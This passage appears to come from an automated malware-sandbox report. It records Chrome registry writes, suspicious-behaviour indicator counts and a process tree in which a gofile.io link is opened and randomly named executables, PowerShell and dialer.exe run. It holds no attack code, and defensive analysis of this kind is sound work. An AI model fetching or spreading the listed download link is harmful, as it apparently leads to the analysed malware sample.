chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000f8f57ce98986da01977fac3b9086da01977fac3b9086da0114000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" chrome.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\NodeSlot = "7" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 00000000ffffffff chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "4" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "5" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 chrome.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 chrome.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" chrome.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags chrome.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 chrome.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" chrome.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exechrome.exejhi_service.exekanilzbpgdul.exeMicrosoftEdgeUpdater.exepowershell.exesvchost.exedialer.exefdjrmaypnxal.exepowershell.exepid process 4704 chrome.exe 4704 chrome.exe 1424 chrome.exe 1424 chrome.exe 1808 jhi_service.exe 1808 jhi_service.exe 1808 jhi_service.exe 1808 jhi_service.exe 1808 jhi_service.exe 1808 jhi_service.exe 1808 jhi_service.exe 1808 jhi_service.exe 3868 kanilzbpgdul.exe 3868 kanilzbpgdul.exe 3868 kanilzbpgdul.exe 3868 kanilzbpgdul.exe 3868 kanilzbpgdul.exe 3868 kanilzbpgdul.exe 4824 MicrosoftEdgeUpdater.exe 992 powershell.exe 992 powershell.exe 992 powershell.exe 1736 svchost.exe 1736 svchost.exe 4824 MicrosoftEdgeUpdater.exe 4824 MicrosoftEdgeUpdater.exe 4824 MicrosoftEdgeUpdater.exe 4824 MicrosoftEdgeUpdater.exe 4824 MicrosoftEdgeUpdater.exe 4824 MicrosoftEdgeUpdater.exe 4824 MicrosoftEdgeUpdater.exe 4824 MicrosoftEdgeUpdater.exe 4824 MicrosoftEdgeUpdater.exe 4824 MicrosoftEdgeUpdater.exe 4824 MicrosoftEdgeUpdater.exe 4824 MicrosoftEdgeUpdater.exe 3036 dialer.exe 3036 dialer.exe 3036 dialer.exe 3036 dialer.exe 3036 dialer.exe 3036 dialer.exe 3036 dialer.exe 4824 MicrosoftEdgeUpdater.exe 4824 MicrosoftEdgeUpdater.exe 4824 MicrosoftEdgeUpdater.exe 3036 dialer.exe 3036 dialer.exe 1736 svchost.exe 1736 svchost.exe 6136 fdjrmaypnxal.exe 3036 dialer.exe 3036 dialer.exe 3036 dialer.exe 3036 dialer.exe 3036 dialer.exe 3036 dialer.exe 3036 dialer.exe 3036 dialer.exe 4508 powershell.exe 4508 powershell.exe 3036 dialer.exe 3036 dialer.exe 3036 dialer.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
chrome.exeExplorer.EXEpid process 5204 chrome.exe 3340 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs
Processes:
chrome.exepid process 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
chrome.exedescription pid process Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe Token: SeShutdownPrivilege 4704 chrome.exe Token: SeCreatePagefilePrivilege 4704 chrome.exe -
Suspicious use of FindShellTrayWindow 56 IoCs
Processes:
chrome.exe7zG.exedwm.exepid process 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 68 7zG.exe 996 dwm.exe 996 dwm.exe 4704 chrome.exe 4704 chrome.exe 996 dwm.exe 996 dwm.exe 996 dwm.exe 996 dwm.exe 996 dwm.exe 996 dwm.exe 996 dwm.exe 996 dwm.exe 996 dwm.exe 996 dwm.exe -
Suspicious use of SendNotifyMessage 26 IoCs
Processes:
chrome.exepid process 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe 4704 chrome.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
Conhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exechrome.exeExplorer.EXEpid process 5492 Conhost.exe 4280 Conhost.exe 2988 Conhost.exe 5960 Conhost.exe 5992 Conhost.exe 5868 Conhost.exe 2068 Conhost.exe 5932 Conhost.exe 5204 chrome.exe 3340 Explorer.EXE 3340 Explorer.EXE 3340 Explorer.EXE 3340 Explorer.EXE 3340 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 4704 wrote to memory of 4568 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4568 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1836 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1512 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 1512 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe PID 4704 wrote to memory of 4632 4704 chrome.exe chrome.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:588
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
PID:996
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Modifies data under HKEY_USERS
PID:640
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:736
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:900
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:440
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:580
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵PID:1044
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:1136
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3124
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1168
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1176
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1184
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1192
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1388
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1408
-
c:\windows\system32\sihost.exesihost.exe2⤵PID:3012
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1436
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1524
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵PID:1532
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵PID:1576
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1780
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵PID:1792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1800
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1844
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1880
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1984
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:1272
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2184
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2192
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2220
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵PID:2272
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2292
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2316
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2332
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2352
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2384
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2804
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2972
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:3024
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵PID:3220
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3340 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/xuEKgb2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffb27329758,0x7ffb27329768,0x7ffb273297783⤵PID:4568
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1532 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:23⤵PID:1836
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1812 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:1512
-
